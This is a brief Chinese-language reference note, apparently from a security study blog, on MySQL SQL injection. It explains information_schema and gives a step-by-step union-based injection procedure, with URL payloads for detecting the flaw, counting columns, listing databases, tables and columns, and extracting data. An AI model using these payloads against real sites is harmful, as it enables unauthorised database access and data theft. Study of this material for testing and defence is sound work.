sql注入--mysql

標籤：base   com   系統   inf   on()   order   5.0   判斷   作業系統   

mysql資料庫結構:

　　資料庫A  --> 表名  --> 列名 --> 資料

　　資料庫B  --> 表名  --> 列名 --> 資料

mysql資料庫資訊:

　　mysql 5.0以上內建資料庫：information_schema

　　information_schema.schemata: 資料庫下的schemata庫名，含義：儲存所有資料庫下的庫名資訊的表。

　　information_schema.tables: 資料庫下的tables表名，含義：儲存所有資料庫下的表名資訊的表。

　　information_schema.columns: 資料庫下的columns表名，含義：儲存所有資料庫下的列名資訊的表。

　　database()：資料庫名

　　user()：資料庫使用者

　　version()：資料庫版本

　　@@version_compile_os：作業系統　

　　table_schema：資料庫名

　　table_name：表名

　　column_name：列名

mysql注入過程:

　　(1) 判斷注入點:  ?id=1 and 1=1 ;? id=1 and 1=2

　　(2) 判斷長度: ?id=1 order by 3

　　(3) 擷取基本資料: @@version_compile_os , version()  , database()  , user()

　　(4) 擷取庫名: ?id=1 union select table_schema,2,3 from information_schema.schemata

　　(5) 擷取表名: ?id=1 union select table_name,2,3 from information_schema.tables where table_schema = 庫名[16進位]

　　(6) 擷取列名: ?id=1 union select column_name,2,3 from information_schema.columns where table_schema = 庫名[16進位]

　　　　　　　　　and table_name = 表名[16進位]

　　(7) 擷取資料: ?id=1 union select 列名[16進位],列名[16進位],3 from 表名[16進位]

 

sql注入--mysql